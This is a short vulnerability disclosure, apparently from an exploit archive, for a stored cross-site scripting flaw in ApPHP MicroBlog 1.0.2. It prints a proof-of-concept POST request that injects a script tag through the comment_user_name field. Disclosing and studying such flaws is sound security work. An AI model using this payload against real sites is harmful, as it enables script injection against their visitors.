ApPHP MicroBlog 1.0.2 Cross Site Scripting

2016.10.13

Credit: Besim

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
Description :
Vulnerable link : http://site_name/path/index.php?page=posts&post_id=
Stored XSS Payload ( Comments ): *
# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
############ POST DATA ############
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment
############ ######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ApPHP MicroBlog 1.0.2 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.